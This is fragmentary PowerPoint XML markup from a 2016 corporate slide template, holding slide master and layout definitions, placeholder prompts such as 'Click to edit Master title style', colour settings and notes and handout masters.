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5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId16"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId17"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="271" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="277" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="270"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1A3D"/>
    <a:srgbClr val="F1697E"/>
    <a:srgbClr val="EE0033"/>
    <a:srgbClr val="FB1536"/>
    <a:srgbClr val="FB2544"/>
    <a:srgbClr val="FB2947"/>
    <a:srgbClr val="FA0629"/>
    <a:srgbClr val="FB3B56"/>
    <a:srgbClr val="FF0066"/>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93" autoAdjust="0"/>
    <p:restoredTop sz="92535" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-1758" y="-24"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="342"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1662" y="-72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="3024"/>
        <p:guide pos="2160"/>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9" y="0"/>
            <a:ext cx="3169920" cy="480060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1A43EB6D-C603-4039-B83F-202B343943CB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/21/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="9119474"/>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1440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DE124458-491E-4C84-A861-FAFFF0F89C89}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="665388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169920" cy="481727"/>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4143589" y="0"/>
            <a:ext cx="3169920" cy="481727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{62EF90AC-B658-4113-B09A-B79DE7796CE8}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>21/12/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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2" y="9119475"/>
            <a:ext cx="3169920" cy="481726"/>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4143589" y="9119475"/>
            <a:ext cx="3169920" cy="481726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{85CD81C6-497D-4C55-8D6D-B2A051C5AA8A}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="253227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CD81C6-497D-4C55-8D6D-B2A051C5AA8A}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:pPr/>
              <a:t>3</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14" name="Title 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236242" y="5287365"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258764" y="6298247"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="screen">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns=""/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7519496" y="8974591"/>
            <a:ext cx="976148" cy="457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9301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SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D0D4B060-A08F-459A-913B-A8B9FE6D8C7C}"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7"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10" name="Oval 9"/>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3713827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8ABD1D7-36E3-4632-A7F3-DBD6215F536A}"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6"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7" name="Oval 6"/>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3312941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400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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4C42CD-0466-455C-8D16-8C5D2A58CE89}"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8"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9" name="Oval 8"/>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6709430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SG" noProof="0"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E83DED-4B68-46B3-9CB9-CC564B969354}"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8"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9" name="Oval 8"/>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21382582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fld id="{E09DBE13-79E6-4E5A-91C4-F537B7596B04}"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7"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8" name="Oval 7"/>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42504732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SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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14" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F022B90F-918A-4899-BB2B-94EF040E84B4}"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7" name="Oval 6"/>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21815686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x1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7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285755" y="1031843"/>
            <a:ext cx="8569325" cy="4790909"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>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8" name="Oval 7"/>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1595173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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5600" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr sz="5600"/>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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Oval 7"/>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1276180450"/>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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179388" y="6336268"/>
            <a:ext cx="8736012" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disclaimer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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71077" y="2717084"/>
            <a:ext cx="7509933" cy="578891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="9423892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 Discov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14" name="Title 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="236242" y="5287365"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258764" y="6298247"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="screen">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns=""/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7519496" y="8974591"/>
            <a:ext cx="976148" cy="457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084573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_Arch">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8" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="965105"/>
            <a:ext cx="674603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b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="475860" y="2295332"/>
            <a:ext cx="5010539" cy="2444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xmlns="" val="1579008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8" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2612569" y="946444"/>
            <a:ext cx="6046238"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b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2585851" y="2258008"/>
            <a:ext cx="5010539" cy="1889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xmlns="" val="9234225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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Oval 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2198077" y="-4350727"/>
            <a:ext cx="7665427" cy="7665427"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED1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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493417" y="530201"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534989" y="1750633"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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360295" y="6220790"/>
            <a:ext cx="6783705" cy="522910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1880833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Divider - Plain">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3815862" y="-5102469"/>
            <a:ext cx="8474319" cy="8474319"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED1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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351167" y="396851"/>
            <a:ext cx="2920482" cy="658098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392739" y="1617283"/>
            <a:ext cx="2869560" cy="356571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Date:</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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6180785"/>
            <a:ext cx="6783705" cy="522910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="29229024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24600"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5B4DEF93-ADD1-4629-8A38-C2F296FE4615}"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16" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="274639"/>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a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1599386"/>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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Oval 7"/>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25583137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SG" dirty="0"/>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5" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E0C6B949-EE58-4B7A-942E-F727EA666C7C}"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9"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11" name="Oval 10"/>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37898005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SG"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{999A5BCD-897A-4CE2-A0B4-4E3205E290F6}" type="datetime1">
              <a:rPr lang="en-SG" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21/12/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6759248" y="6548106"/>
            <a:ext cx="21336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smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Oval 12"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7537062" y="6093681"/>
            <a:ext cx="1273974" cy="1273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solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Group Enterprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
